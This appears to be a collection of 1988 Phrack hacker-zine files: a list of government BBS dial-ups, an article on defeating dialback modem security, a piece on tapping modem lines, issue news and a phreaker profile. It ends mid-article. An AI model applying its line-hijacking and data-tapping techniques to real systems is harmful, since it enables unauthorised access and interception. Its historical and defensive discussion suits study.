Information Resources Service Center.
Data: 202-535-8054 300 bps
Data: 202-535-7661 1200 bps
GSA's Information Resources Service Center provides information on contracts,
schedules, policies, and programs. One of the areas that is interesting was
the weekly supplement to the consolidated list of debarred, suspended and
ineligible contractors.
-----------------------------------------------------------------------------
Budget and Finance Board of the Office of Immigration Naturalization Service.
DO NOT CALL THIS BBS DURING WORKING HOURS.
Sysop: Mike Arnold
Data: 202-787-3460 300/1200/2400
The system is devoted to the exchange of information related to budget and
financial management in the federal government. It is a 'working' system
for the Immigration and Naturalization Service personnel.
-----------------------------------------------------------------------------
Naval Aviation News Computer Information (NANei) -
Supported by: Naval Aviation News Magazine, Bldg. 159E, Navy Yard Annex,
Washington, DC 20374.
Sysop: Commander Howard Wheeler
Voice: 202-475-4407
Data: 202-475-1973 300/1200
Available from 5 pm to 8 am. weekdays 5pm Friday to 8 am Monday
This is a large BBS with lots of Navy related information and programs. NANci
is for those interested in stories, facts, and historical information
related to Naval Aviation.
-----------------------------------------------------------------------------
Federal National Mortgage Association -
Sysop: Ken Goosens
Data: 202-537-7475
202-537-7945 300/1200
This BBS is in transition. Ken Gossens will be running a new BBS at
703-979-6360. The BBS maybe become a closed board under the new sysop. This
BBS has/had one of largest collections of files for downloading.
-----------------------------------------------------------------------------
The World Bank, Information, Technology and Facilities Department, Office
System Division, Washington DC.
Sysop: Ashok Daswani
Voice: 202-473-2237
Data: 202-676-0920 300/1200
Basically a software exchange BBS, but has other information about the use of
microcomputers and software supported by World Bank. IBM product
announcements also kept up to date.
-----------------------------------------------------------------------------
National Oceanic Atmospheric Administration (NOAA), National Meteorological
Center.
* You must obtain a password from the SYSOP to log on to this BBS.
Sysop: Vernon Patterson
Voice: 301-763-8071
Data: 301-899-0825 300 bps
301-899-0830 1200 bps
This is one of the most useful databases available on-line. With it you can
access meteorological data collected form 6000 locations throughout the
world. It can also display crude, but useful graphic maps of the US
illustration temperatures, precipitation and forecasts.
-----------------------------------------------------------------------------
National Weather Service, US Dept. of Commerce, East Coast Marine Users BBS
* You must obtain a p/w from the SYSOP to logon this BBS.
Sysop: Ross Laporte
Voice: 301-899-3296
Data: 301-454-8700 300bps
Use this BBS to obtain info about marine weather and nautical info about
coastal waterways including topical storm advisories.
-----------------------------------------------------------------------------
NARDAC, Navy Regional Data Automation Center, Norfolk, VA. 23511-6497
Sysop: Jerry Dew
Voice: 804-445-4298
Data: 804-445-1627 300 & 1200 bps
A basic Utilitarian system developed to support the informational needs of
NARDAC. The Dept. of Defense mag., CHIPS is available in the files section
of this BBS. There are also Navy and IBM related articles to read.
-----------------------------------------------------------------------------
Veterans Administration, Info Technology Bulletin Board.
Data: 202-376-2184 300/1200 bps
The content of this BBS ranges from job opening listings to information
computer security.
-----------------------------------------------------------------------------
Dept. of Energy, Office of Civilian Radioactive Waste Management, Infolink.
Sysop: Bruce Birnbaum
Voice: 202-586-9707
Data: 202-586-9359 300/1200 bps
This BBS has press leases, fact sheets, backgrounders, congressional
questions, answers, speeches & testimony, from the Office of Civilian
Radioactive Waste Management.
-----------------------------------------------------------------------------
I skipped listing a few of the BBSes in this article if the chances were slim
to get on or if the BBS got a bad review. Most of the ones listed seemed
to have lot of informative files for downloading and viewing pleasure.
This article carried a very strong word of warning about tampering/crashing
these since they are run by the govt. and a volunteer Sysop. Since you can
get on these legally why not use it?
The Sorceress

212
phrack17/8.txt Normal file
View file

@ -0,0 +1,212 @@
% = % = % = % = % = % = % = %
= =
% P h r a c k X V I I %
= =
% = % = % = % = % = % = % = %
Phrack Seventeen
07 April 1988
File 8 of 12 : Dialback Modem Security
In article <906@hoptoad.uucp> gnu@hoptoad.UUCP writes:
>Here are the two messages I have archived on the subject...
>[I believe the definitive article in that discussion was by Lauren Weinstein,
>vortex!lauren; perhaps he has a copy.
What follows is the original article that started the discussion. I
do not know whether it qualifies as the "definitive article" as I think I
remember Lauren and I both posted further comments.
- Dave
** ARTICLE FOLLOWS **
------------------------------------------------------------------------------
An increasingly popular technique for protecting dial-in ports from
the ravages of hackers and other more sinister system penetrators is dial back
operation wherein a legitimate user initiates a call to the system he desires
to connect with, types in his user ID and perhaps a password, disconnects and
waits for the system to call him back at a prearranged number. It is assumed
that a penetrator will not be able to specify the dial back number (which is
carefully protected), and so even if he is able to guess a user-name/password
pair he cannot penetrate the system because he cannot do anything meaningful
except type in a user-name and password when he is connected to the system. If
he has a correct pair it is assumed the worst that could happen is a spurious
call to some legitimate user which will do no harm and might even result in a
security investigation.
Many installations depend on dial-back operation of modems for their
principle protection against penetration via their dial up ports on the
incorrect presumption that there is no way a penetrator could get connected to
the modem on the call back call unless he was able to tap directly into the
line being called back. Alas, this assumption is not always true -
compromises in the design of modems and the telephone network unfortunately
make it all too possible for a clever penetrator to get connected to the call
back call and fool the modem into thinking that it had in fact dialed the
legitimate user.
The problem areas are as follows:
Caller control central offices
Many older telephone central office switches implement caller control
in which the release of the connection from a calling telephone to a called
telephone is exclusively controlled by the originating telephone. This means
that if the penetrator simply failed to hang up a call to a modem on such a
central office after he typed the legitimate user's user-name and password,
the modem would be unable to hang up the connection.
Almost all modems would simply go on-hook in this situation and not
notice that the connection had not been broken. If the same line was used to
dial out on as the call came in on, when the modem went to dial out to call
the legitimate user back the it might not notice (there is no standard way of
doing so electrically) that the penetrator was still connected on the line.
This means that the modem might attempt to dial and then wait for an
answerback tone from the far end modem. If the penetrator was kind enough to
supply the answerback tone from his modem after he heard the system modem
dial, he could make a connection and penetrate the system. Of course some
modems incorporate dial tone detectors and ringback detectors and in fact wait
for dial tone before dialing, and ringback after dialing but fooling those
with a recording of dial tone (or a dial tone generator chip) should pose
little problem.
Trying to call out on a ringing line
Some modems are dumb enough to pick up a ringing line and attempt to
make a call out on it. This fact could be used by a system penetrator to
break dial back security even on joint control or called party control central
offices. A penetrator would merely have to dial in on the dial-out line
(which would work even if it was a separate line as long as the penetrator was
able to obtain it's number), just as the modem was about to dial out. The
same technique of waiting for dialing to complete and then supplying
answerback tone could be used - and of course the same technique of supplying
dial tone to a modem which waited for it would work here too.
Calling the dial-out line would work especially well in cases where
the software controlling the modem either disabled auto-answer during the
period between dial-in and dial-back (and thus allowed the line to ring with
no action being taken) or allowed the modem to answer the line (auto-answer
enabled) and paid no attention to whether the line was already connected when
it tried to dial out on it.
The ring window
However, even carefully written software can be fooled by the ring
window problem. Many central offices actually will connect an incoming call
to a line if the line goes off hook just as the call comes in without first
having put the 20 hz. ringing voltage on the line to make it ring. The ring
voltage in many telephone central offices is supplied asynchronously every 6
seconds to every line on which there is an incoming call that has not been
answered, so if an incoming call reaches a line just an instant after the end
of the ring period and the line clairvoyantly responds by going off hook it
may never see any ring voltage.
This means that a modem that picks up the line to dial out just as our
penetrator dials in may not see any ring voltage and may therefore have no way
of knowing that it is connected to an incoming call rather than the call
originating circuitry of the switch. And even if the switch always rings
before connecting an incoming call, most modems have a window just as they are
going off hook to originate a call when they will ignore transients (such as
ringing voltage) on the assumption that they originate from the going-off-hook
process. [The author is aware that some central offices reverse battery (the
polarity of the voltage on the line) in the answer condition to distinguish it
from the originate condition, but as this is by no means universal few if any
modems take advantage of the information supplied]
In Summary
It is thus impossible to say with any certainty that when a modem goes
off hook and tries to dial out on a line which can accept incoming calls it
really is connected to the switch and actually making an outgoing call. And
because it is relatively easy for a system penetrator to fool the tone
detecting circuitry in a modem into believing that it is seeing dial tone,
ringback and so forth until he supplies answerback tone and connects and
penetrates system security should not depend on this sort of dial-back.
Some Recommendations
Dial back using the same line used to dial in is not very secure and
cannot be made completely secure with conventional modems. Use of dithered
(random) time delays between dial in and dial back combined with allowing the
modem to answer during the wait period (with provisions made for recognizing
the fact that this wasn't the originated call - perhaps by checking to see if
the modem is in originate or answer mode) will substantially reduce this
window of vulnerability but nothing can completely eliminate it.
Obviously if one happens to be connected to an older caller control
switch, using the same line for dial in and dial out isn't secure at all. It
is easy to experimentally determine this, so it ought to be possible to avoid
such situations.
Dial back using a separate line (or line and modem) for dialing out is
much better, provided that either the dial out line is sterile (not readily
traceable by a penetrator to the target system) or that it is a one way line
that cannot accept incoming calls at all. Unfortunately the later technique
is far superior to the former in most organizations as concealing the
telephone number of dial out lines for long periods involves considerable
risk. The author has not tried to order a dial out only telephone line, so he
is unaware of what special charges might be made for this service or even if
it is available.
A final word of warning
In years past it was possible to access telephone company test and
verification trunks in some areas of the country by using mf tones from so
called "blue boxes". These test trunks connect to special ports on telephone
switches that allow a test connection to be made to a line that doesn't
disconnect when the line hangs up. These test connections could be used to
fool a dial out modem, even one on a dial out only line (since the telephone
company needs a way to test it, they usually supply test connections to it
even if the customer can't receive calls).
Access to verification and test ports and trunks has been tightened
(they are a kind of dial-a-wiretap so it ought to be pretty difficult) but in
any as in any system there is always the danger that someone, through
stupidity or ignorance if not mendacity will allow a system penetrator access
to one.
** Some more recent comments **
Since posting this I have had several people suggest use of PBX lines
that can dial out but not be dialed into or outward WATS lines that also
cannot be dialed. Several people have also suggested use of call forwarding
to forward incoming calls on the dial out line to the security office. [This
may not work too well in areas served by certain ESS's which ring the number
from which calls are being forwarded once anyway in case someone forgot to
cancel forwarding. Forwarding is also subject to being cancelled at random
times by central office software reboots]
And since posting this I actually tried making some measurements of
how wide the incoming call window is for the modems we use for dial in at
CRDS. It appears to be at least 2-3 seconds for US Robotics Courier 2400 baud
modems. I found I could defeat same-line-for-dial-out dialback quite handily
in a few dozen tries no matter what tricks I played with timing and watching
modem status in the dial back login software. I eventually concluded that
short of reprogramming the micro in the modem to be smarter about monitoring
line state, there was little I could do at the login (getty) level to provide
much security for same line dialback.
Since it usually took a few tries to break in, it is possible to
provide some slight security improvement by sharply limiting the number of
unsuccessful callbacks per user per day so that a hacker with only a couple of
passwords would have to try over a significant period of time.
Note that dialback on a dedicated dial-out only line is somewhat
secure.
David I. Emery Charles River Data Systems 617-626-1102
983 Concord St., Framingham, MA 01701.
uucp: decvax!frog!die
--
David I. Emery Charles River Data Systems
983 Concord St., Framingham, MA 01701 (617) 626-1102 uucp: decvax!frog!die

79
phrack17/9.txt Normal file
View file

@ -0,0 +1,79 @@
% = % = % = % = % = % = % = %
= =
% P h r a c k X V I I %
= =
% = % = % = % = % = % = % = %
Phrack Seventeen
07 April 1988
File 9 of 12 : Data-Tapping Made Easy
--FEATURE ARTICLES AND REVIEWS-
TAPPING COMPUTER DATA IS EASY, AND CLEARER THAN PHONE CALLS !
BY RIC BLACKMON, SYSOP OF A FED BBS
Aquired by Elric of Imrryr & Lunatic Labs UnLtd
Note from Elric: This file was written by the sysop of a board for computer
security people (run on a CoCo), as far as I know the board no longer exists,
it was being crashed by hackers too much... (hehe).
---------------------
FOR SEVERAL YEARS, I ACCEPTED CERTAIN BITS OF MISINFORMATION AS
TECHNICALLY ACCURATE, AND DIDN'T PROPERLY PURSUE THE MATTER. SEVERAL FOOLS
GAVE ME FOOLISH INFORMATION, SUCH AS: A TAP INTERRUPTS COMPUTER DATA
TRANSMISSIONS; DATA COULD BE PICKED UP AS RF EMANATIONS BUT IT WAS A MASS OF
UNINTELLIGIBLE SIGNAL CAUSED BY DATA MOVING BETWEEN REGISTERS; ONE HAD TO BE
IN 'SYNC' WITH ANY SENDING COMPUTER; DATA COULDN'T BE READ UNLESS YOU HAD A
DIRECT MATCH IN SPEED, PARITY & BIT PATTERN; AND ONLY A COMPUTER OF THE SAME
MAKE AND MODEL COULD READ THE SENDING COMPUTER. THIS IS ALL PLAIN SWILL. IT
IS IN FACT, AN EASIER CHORE TO TAP A COMPUTER THAN A TELEPHONE. THE TECHNIQUE
AND THE EQUIPMENT IS ALMOST THE SAME, BUT THE COMPUTER LINE WILL BE MORE
ACCURATE (THE TWO COMPUTERS INVOLVED, HAVE ERROR CORRECTING PROCEDURES) AND
CLEARER (DIGITAL TRANSMISSIONS HAVE MORE DISTINCT SIGNALS THAN ANALOG
TRANSMISSIONS).
FIRST, RECOGNIZE THAT NEARLY ALL DATA TRANSMISSIONS ARE SENT IN CLEARTEXT
ASCII SIGNALS. THE LINES CARRYING OTHER BIT-GROUPS OR ENCIPHERED TEXTS ARE
RARE. SECOND, THE SIGNAL APPEARS ON GREEN AND RED (WIRES) OF THE PHONE LINE
('TIP' AND 'RING'). THE DATA IS MOST LIKELY ASYNCHRONOUS SERIAL DATA MOVING
AT 300 BAUD. NOW THAT 1200 BAUD IS BECOMING MORE CHIC, YOU CAN EXPECT TO FIND
A GROWING USE OF THE FASTER TRANSMISSION RATE. FINALLY, YOU DON'T NEED TO
WORRY ABOUT THE PROTOCOL OR EVEN THE BAUD RATE (SPEED) UNTIL AFTER A TAPED
COPY OF A TRANSMISSION IS OBTAINED.
IN A SIMPLE EXPERIMENT, A TAPED COPY OF A DATA TRANSMISSION WAS MADE
WITH THE CHEAPEST OF TAPE RECORDERS, TAPPING THE GREEN AND RED LINES BEYOND
THE MODEM. THE RECORDING WAS THEN PLAYED INTO A MODEM AS THOUGH IT WERE AN
ORIGINAL TRANSMISSION. AT THAT POINT, HAD IT BEEN NECESSARY, THE PROTOCOL
SETTINGS ON RECEIVING TERMINAL COULD HAVE BEEN CHANGED TO MATCH THE TAPE. NO
ADJUSTMENTS WERE NECESSARY AND A NICE, CLEAR ERROR-FREE DOCUMENT WAS RECEIVED
ON THE ILLICIT VIDEO SCREEN AND A NEAT HARD-COPY OF THE DOCUMENT CAME OFF THE
PRINTER. THE MESSAGE WAS INDEED CAPTURED, BUT HAD IT BEEN AN INTERCEPTION
INSTEAD OF A SIMPLE MONITORING, IT COULD HAVE BEEN ALTERED WITH A SIMPLE WORD
PROCESSOR PROGRAM, TO SUIT ANY PURPOSE, AND PLACED BACK ON THE WIRE.
WERE I TO HAVE AN INTEREST IN INFORMATION ORIGINATING FROM A
PARTICULAR COMPANY, AGENCY, OR OFFICE, I THINK THAT I WOULD FIND IT FAR MORE
PRODUCTIVE TO TAP A DATA TRANSMISSION THAN TO TAP A VOICE TRANSMISSION, AND
EVEN MORE REWARDING THAN GETTING HARDCOPY DOCUMENTS.
*SIGNIFICANT & IMPORTANT INFORMATION IS MORE CONCENTRATED IN A DATA
TRANSMISSION.
*SIGNIFICANT & IMPORTANT INFORMATION IS MORE EASILY LOCATED IN DATA
TRANSMISSIONS THAN IN MASSES OF FILES OR PHONE CALLS.
*TRANSMITTED DATA IS PRESUMED TRUE, AND WHEN ALTERATION IS DISCOVERED,
IT'S READILY BLAMED ON THE EQUIPMENT.
*THE LAWS CONCERNING TAPS ON UNCLASSIFIED AND NON-FINANCIAL COMPUTER
DATA ARE EITHER QUITE LACKING OR ABJECTLY STUPID.
THE POINT OF ALL THIS IS THAT THE PRUDENT MANAGER REALLY OUGHT TO ENCRYPT ALL
DATA TRANSMISSIONS. ENCRYPTION PACKAGES ARE CHEAP (A 'DES' PROGRAM IS NOW
PRICED AT $30) AND ARE EASY TO USE.
-------------------------------

36
phrack18/1.txt Normal file
View file

@ -0,0 +1,36 @@
==Phrack Inc.==
Volume Two, Issue 18, Phile #1 of 11
Index
=====
June 7, 1988
Well, Phrack Inc. is still alive but have changed editors again. I,
Crimson Death am now the new editor of Phrack Inc. The reason why I am the
new editor is because of the previous editors in school and they did not just
have the time for it. So, if you would like to submit an article for Phrack
Inc. please contact: Crimson Death, Control C, or Epsilon, or call my BBS
(The Forgotten Realm) or one of the BBSes on the sponsor BBS listing (Found in
PWN Part 1). We are ALWAYS looking for more files to put in upcoming issues.
Well, that about does it for me. I hope you enjoy Phrack 18 as much as we at
The Forgotten Realm did bringing it to you. Later...
Crimson Death
Sysop of The Forgotten Realm
------------------------------------------------------------------------------
This issue of Phrack Inc. includes the following:
#1 Index of Phrack 18 by Crimson Death (02k)
#2 Pro-Phile XI on Ax Murderer by Crimson Death (04k)
#3 An Introduction to Packet Switched Networks by Epsilon (12k)
#4 Primos: Primenet, RJE, DPTX by Magic Hasan (15k)
#5 Hacking CDC's Cyber by Phrozen Ghost (12k)
#6 Unix for the Moderate by Urvile (11k)
#7 Unix System Security Issues by Jester Sluggo (27k)
#8 Loop Maintenance Operating System by Control C (32k)
#9 A Few Things About Networks by Prime Suspect (21k)
#10 Phrack World News XVIII Part I by Epsilon (09k)
#11 Phrack World News XVIII Part II by Epsilon (05k)
==============================================================================

194
phrack18/10.txt Normal file
View file

@ -0,0 +1,194 @@
==Phrack Inc.==
Volume Two, Issue 18, Phile #10 of 11
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN >>>>>=-* Phrack World News *-=<<<<< PWN
PWN Issue XVIII/1 PWN
PWN PWN
PWN Created, Compiled, and Written PWN
PWN By: Epsilon PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Intro
=====
Welcome to yet another issue of Phrack World News. We have once again
returned to try and bring you an entertaining, and informative newsletter
dedicated to the spread of information and knowledge throughout the H/P
community.
______________________________________________________________________________
TOK Re-Formed
=============
A group called Tribunal Of Knowledge, which has undergone previous
re-formations has once again re-formed. The person who is currently "in
charge" of the group says that he had permission from High Evolutionary, the
group's founder, to re-form the organization. Although the group hasn't
publicly announced their existence or written any files, we should be hearing
from them in the near future.
The Current Members of TOK Include -
Control C
Prime Suspect
Jack Death
The UrVile
The Prophet
Psychic Warlord
Information Provided By Control C, and Prime Suspect.
______________________________________________________________________________
Phrack Inc. Support Boards
==========================
Phrack Inc. has always made it a habit to set up Phrack Inc. sponsor accounts
on the more popular boards around. These sponsor accounts are set up, so that
the users may get in touch with the Phrack Magazine staff if they would like
to contribute an article, or any other information to our publication. Please
take note of the boards on which Phrack Inc. accounts are set up. Thank you.
The Current List of Phrack Inc. Sponsor Boards Includes -
P-80 Systems - 304/744-2253
OSUNY - 914/725-4060
The Central Office - 914/234-3260
Digital Logic's DS - 305/395-6906
The Forgotten Realm - 618/943-2399 *
* - Phrack Headquarters
______________________________________________________________________________
SummerCon '88 Preliminary Planning
==================================
Planning for SummerCon '88 is underway. So far, we have decided on four
tentative locations: New York City, Saint Louis, Atlanta, or Florida. Since
this is only tentative, no dates have been set or reservations made for a
conference.
If you have any comments, suggestions, etc, please let us know. If you are
planning to attend SummerCon '88, please let us know as well. Thank you.
Information Provided By The Forgotten Realm.
______________________________________________________________________________
LOD/H Technical Journal
=======================
Lex Luthor of LOD/H (Legion of Doom/Hackers) has been busy with school, etc.,
so he has not had the time, nor the initiative to release the next issue of
the LOD/H Technical Journal. On this note, he has tentatively turned the
Journal over to Phantom Phreaker, who will probably be taking all
contributions for the Journal. No additional information is available.
Information Provided By The UrVile and Phantom Phreaker.
______________________________________________________________________________
Congress To Restrict 976/900 Dial-A-Porn Services
=================================================
Congress is considering proposals to restrict dial-up services in an effort to
make it difficult for minors to access sexually explicit messages. A
House-Senate committee is currently negotiating the "dial-a-porn" proposal.
Lawmakers disagree whether or not the proposal is constitutional and are
debating the issue of requiring phone companies to offer a service that would
allow parents, free of charge, to block the 976/900 services. Other proposals
would require customers to pay in advance or use credit cards to access the
976/900 services.
Some companies are currently offering free services that restrict minors from
accessing sexually explicit messages. AT&T and Department of Justice
officials are cooperating in a nationwide crackdown of "dial-a-porn" telephone
companies. The FCC recently brought charges against one of AT&T's largest 900
Service customers, and AT&T provided the confidential information necessary in
the prosecution. AT&T also agreed to suspend or disconnect services of
companies violating the commission ban by transmitting obscene or indecent
messages to minors.
______________________________________________________________________________
Some Hope Left For Victims Of FGD
=================================
US Sprint's famed FGD (Feature Group D) dial-ups and 800 INWATS exchanges may
pose no threat to individuals under switches that do not yet offer equal
access service to alternate long distance carriers. Due to the way Feature
Group D routes its information, the ten-digit originating number of the caller
is not provided when the call is placed from a non-equal access area. The
following was taken from an explanation of US Sprint's 800 INWATS Service.
*************************************************************
CALL DETAIL
*************************************************************
With US Sprint 800 Service, a customer will receive call detail information
for every call on every invoice. The call detail for each call includes:
o Date of call
o Time of call
o The originating city and state
o The ten-digit number of the caller if the call originates in an
equal access area or the NPA of the caller if the non-equal access
area.
o Band into which the call falls
o Duration of the call in minutes
o Cost of the call
This came directly from US Sprint. Do as you choose, but don't depend on
this.
Information Provided by US Sprint.
______________________________________________________________________________
Telenet Bolsters Network With Encryption
========================================
Telenet Communications Corporation strengthened its public data network
recently with the introduction of data encryption capability.
The X.25 Encryption Service provides a type of data security previously
unavailable on any public data network, according to analysts. For Telenet,
the purpose of the offering is "to be more competitive; nobody else does
this," according to Belden Menkus, an independent network security consultant
based in Middleville, NJ.
The service is aimed at users transmitting proprietary information between
host computers, such as insurance or fund-transfer applications. It is priced
at $200 per month per host computer connection. Both the confidentiality and
integrity of the data can be protected via encryption.
The scheme provides end-to-end data encryption, an alternative method whereby
data is decrypted and recrypted at each node in the network. "This is a
recognition that end-to-end encryption is really preferable to link
encryption," Menkus said.
The service is available over both dial-up and leased lines, and it supports
both synchronous and asynchronous traffic at speeds up to 9.6K BPS.
Telenet has approved one particular data encryption device for use with the
service, The Cipher X 5000, from Technical Communications Corporation (TCC), a
Concord, Massachusetts based vendor. TCC "has been around the data encryption
business for quite a while," Menkus said.
The Cipher X implements the National Bureau of Standards' Data Encryption
Standard (DES). DES is an algorithm manipulated by a secret 56 bit key.
Computers protected with the device can only be accessed by users with a
matching key.
The data encryptor is installed at user sites between the host computer and
the PAD (Packet Assembler/Disassembler).
Installation of the TCC device does not affect the user's ability to send
non-encrypted data, according to Telenet. By maintaining a table of network
addresses that require encryption, the device decides whether or not to
encrypt each transmission.
Information Provided by Network World.
______________________________________________________________________________
==============================================================================

106
phrack18/11.txt Normal file
View file

@ -0,0 +1,106 @@
==Phrack Inc.==
Volume Two, Issue 18, Phile #11 of 11
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN >>>>>=-* Phrack World News *-=<<<<< PWN
PWN Issue XVIII/2 PWN
PWN PWN
PWN Created By Knight Lightning PWN
PWN PWN
PWN Compiled and Written PWN
PWN by Epsilon PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Intro
=====
It seems that there is yet some things to be covered. In addendum, we will be
featuring, as a part of PWN, a special section where up-and-coming H/P
Bulletin Boards can be advertised. This will let everyone know where the
board scene stands. If you have a board that you feel has potential, but
doesn't have good users, let us know. Thanks.
______________________________________________________________________________
Doctor Cypher Busted?
=====================
Doctor Cypher, who frequents the Altos Chat, The Dallas Hack Shack, Digital
Logic's Data Service, The Forgotten Realm, P-80 Systems, and others, is
believed to have had his modem confiscated by "Telephone Company Security,"
and by his local Sheriff. No charges have been filed as of this date. He
says he will be using a friend's equipment to stay in touch with the world.
Information Provided by Hatchet Molly
______________________________________________________________________________
Give These Boards A Call
========================
These systems have potential, but need good users, so give them a call, and
help the world out.
The Autobahn - The Outlet Private -
703/629-4422 313/261-6141
Primary - 'central' newuser/kenwood
Sysop - The Highwayman Sysop - Ax Murderer
Hack/Phreak Private Hack/Phreak
Dallas Hack Shack - The Forgotten Realm -
214/422-4307 618/943-2399
Apply For Access Apply For Access
Sysop - David Lightman Sysop - Crimson Death
Private Hack/Phreak Private H/P & Phrack Headquarters
______________________________________________________________________________
AllNet Hacking Is Getting Expensive
===================================
For those of you who hack AllNet Long Distance Service, watch out. AllNet
Communications Corp. has announced that they will be charging $500.00 PER
ATTEMPT to hack their service. That's not PER VALID CODE, that's PER ATTEMPT.
Sources say that The Fugitive (619) received a $200,000.00 phone bill from
AllNet.
This may set examples for other long distance communication carriers in the
future, so be careful what you do.
______________________________________________________________________________
Editorial - What Is The Best Way To Educate New Hackers?
========================================================
Since the "demise" of Phreak Klass 2600 and PLP, the H/P world has not seen a
board dedicated to the education of new hackers. Although PK2600 is still up
(806/799-0016, educate) many of the old "teachers" never call. The board has
fallen mainly to new hackers who are looking for teachers. This may pose a
problem. If boards aren't the way to educate these people (I think they are
the best way, in fact), then what is? Certainly not giant Alliance
conferences as in the past, due to recent "black-listing" of many "conferees"
who participated heavily in Alliance Teleconferencing in the past.
I think it might be successful if someone was able to set up another board
dedicated to teaching new hackers. A board which is not private, but does
voice validate the users as they login. Please leave some feedback as to what
you think of this idea, or if you are willing to set this type of system up.
Thanks.
______________________________________________________________________________
US Sprint Employee Scam
=======================
The US Sprint Security Department is currently warning employees of a scam
which could be affecting them. An unidentified man has been calling various
employees throughout the US Sprint system and telling them that if they give
him their FON Card numbers, they will receive an additional US Sprint employee
long-distance credit. The Security Department says, "this is a 100 percent
scam." "If you're called to take part in this operation, please call the
Security Department at (816)822-6217."
Information Provided By US Sprint
______________________________________________________________________________

94
phrack18/2.txt Normal file
View file

@ -0,0 +1,94 @@
==Phrack Inc.==
Volume Two, Issue 18, Phile #2 of 11
==Phrack Pro-Phile XI==
Written and Created by Crimson Death
Welcome to Phrack Pro-Phile XI. Phrack Pro-Phile is created to bring info
to you, the users, about old or highly important/controversial people. This
month, I bring to you a name familiar to most in the BBS world...
Ax Murderer
===========
Ax Murderer is popular to many of stronger names in the P/H community.
------------------------------------------------------------------------------
Personal
========
Handle: Ax Murderer
Call him: Mike
Past handles: None
Handle origin: Thought of it while on CompuServe.
Date of Birth: 10/04/72
Age at current date: 15
Height: 6' 2''
Weight: 205 Lbs.
Eye color: Brown
Hair Color: Brown
Computers: IBM PC, Apple II+, Apple IIe
Sysop/Co-Sysop of: The Outlet Private, Red-Sector-A, The Autobahn
------------------------------------------------------------------------------
Ax Murderer started phreaking and hacking in 1983 through the help of some
of his friends. Members of the Hack/Phreak world which he has met include
Control C, Bad Subscript, The Timelord. Some of the memorable phreak/hack
BBS's he was/is on included WOPR, OSUNY, Plovernet, Pirate 80, Shadow Spawn,
Metal Shop Private, Sherwood Forest (213), IROC, Dragon Fire, and Shadowland.
His phreaking and hacking knowledge came about with a group of people in which
some included Forest Ranger and The Timelord.
Ax Murderer is a little more interested in Phreaking than hacking. He
does like to program however, he can program in 'C', Basic, Pascal, and
Machine Language.
The only group in which Ax Murderer has been in is Phoneline Phantoms.
------------------------------------------------------------------------------
Interests: Telecommunications (Modeming, phreaking, hacking,
programming), football, track, cars, and music.
Ax Murderer's Favorite Thing
----------------------------
His car... (A Buick Grand National)
His gilrfriend... (Sue)
Rock Music
Most Memorable Experiences
--------------------------
Newsweek Incident with Richard Sandza (He was the Judge for the tele-trial)
Some People to Mention
----------------------
Forest Ranger (For introducing me to everyone and getting me on Dragon Fire)
Taran King (For giving me a chance on MSP and the P/H world)
Mind Bender (For having ANY utilities I ever needed)
The Necromancer (Getting me my Apple'cat)
The Titan (Helping me program the BBS)
All for being friends and all around good people and phreaks.
------------------------------------------------------------------------------
Ax Murderer is out and out against the idea of the destruction of data.
He hated the incident with MIT where the hackers were just hacking it to
destroy files on the system. He says that it ruins it for the everyone else
and gives 'True Hackers' a bad name. He hates it when people hack to destroy,
Ax has no respect for anyone who does this today. Where have all the good
times gone?
------------------------------------------------------------------------------
I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
in the near future.... And now for the regularly taken poll from all
interviewees.
Of the general population of phreaks you have met, would you consider most
phreaks, if any, to be computer geeks? "No, not really." Thanks Mike.
Crimson Death
Sysop of The Forgotten Realm
==============================================================================

214
phrack18/3.txt Normal file
View file

@ -0,0 +1,214 @@
==Phrack Inc.==
Volume Two, Issue 18, Phile #3 of 11
_ _ _ _ _____________________________________________ _ _ _ _
_-_-_-_- -_-_-_-_
_-_-_-_- An Introduction To -_-_-_-_
_-_-_-_- -_-_-_-_
_-_-_-_- Packet Switched Networks -_-_-_-_
_-_-_-_- -_-_-_-_
_-_-_-_- -_-_-_-_
_-_-_-_- -_-_-_-_
_-_-_-_- Written By - Revised - -_-_-_-_
_-_-_-_- -_-_-_-_
_-_-_-_- Epsilon 05/3/88 -_-_-_-_
_-_-_-_-_____________________________________________-_-_-_-_
Preface -
In the past few years, Packet Switched Networks have become a prominent
feature in the world of telecommunications. These networks have provided ways
of communicating with virtually error-free data, over very large distances.
These networks have become an imperative to many a corporation in the business
world. In this file we will review some of the basic aspects of Packet
Switched Networks.
Advantages -
The Packet Switched Network has many advantages to the common user, and
even more to the hacker, which will be reviewed in the next topic.
The basis of a Packet Switched Network is the Packet Switch. This network
enables the service user to connect to any number of hosts via a local POTS
dial-up/port. The various hosts pay to be connected to this type of network,
and that's why there is often a surcharge for connection to larger public
services like Compuserve or The Source.
A Packet Switched Network provides efficient data transfer and lower rates
than normal circuit switched calls, which can be a great convenience if you
are planning to do a lot of transferring of files between you and the host.
Not only is the communication efficient, it is virtually error free.
Whereas in normal circuit switched calls, there could be a drastic increase in
errors, thus creating a bad transfer of data.
When using a Packet Switched Network, it is not important that you
communicate at the same baud rate as your host. A special device regulates
the speed so that the individual packets are sped up or slowed down, according
to your equipment. Such a device is called a PAD (Packet Assembler
Disassembler).
A PSN also provides access to a variety of information and news retrieval
services. The user pays nothing for these calls, because the connections are
collect. Although the user may have to subscribe to the service to take
advantage of it's services, the connection is usually free, except for a
surcharge on some of the larger subscription services.
Advantages To Hackers -
Packet Switched Networks, to me, are the best thing to come along since the
phone system. I'm sure many other hackers feel the same way. One of the
reasons for this opinion is that when hacking a system, you need not dial out
of your LATA, using codes or otherwise.
Now, the hacker no longer has to figure out what parameters he has to set
his equipment to, to communicate with a target computer effectively. All
PSSes use the same protocol, set by international standards. This protocol is
called X.25. This protocol is used on every network-to-network call in the
world.
When operating on a packet switch, you are not only limited to your own
network (As if that wasn't enough already). You can access other PSSes or
private data networks through gateways which are implemented in your PSN.
There are gateways to virtually every network, from virtually every other
network, except for extremely sensitive or private networks, in which case
would probably be completely isolated from remote access.
Another advantage with PSNs is that almost everyone has a local port, which
means if you have an outdial (Next paragraph), you can access regular circuit
switched hosts via your local Packet Switched Network port. Since the ports
are local, you can spend as much time as you want on it for absolutely no
cost. So think about it. Access to any feasible network, including overseas
